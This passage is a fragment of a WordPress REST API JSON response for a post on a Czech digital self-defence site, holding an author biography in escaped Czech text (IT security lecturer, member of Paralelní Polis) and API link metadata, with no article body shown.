M\u00e1m za sebou v\u00edce ne\u017e dvacet let profesion\u00e1ln\u00ed praxe v IT, p\u0159edn\u00e1\u0161\u00edm a p\u00ed\u0161u \u010dl\u00e1nky o IT bezpe\u010dnosti, kryptom\u011bn\u00e1ch a nov\u00fdch technologi\u00edch. Od roku 2014 jsem sou\u010d\u00e1st\u00ed nezikov\u00e9 organizace Paraleln\u00ed Polis v Praze.","sameAs":["https:\/\/www.facebook.com\/digitalnisebeobrana\/","https:\/\/x.com\/sodomak"]}]}},"_links":{"self":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts\/5102","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/comments?post=5102"}],"version-history":[{"count":4,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts\/5102\/revisions"}],"predecessor-version":[{"id":7050,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts\/5102\/revisions\/7050"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/media\/5106"}],"wp:attachment":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/media?parent=5102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/categories?post=5102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/tags?post=5102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}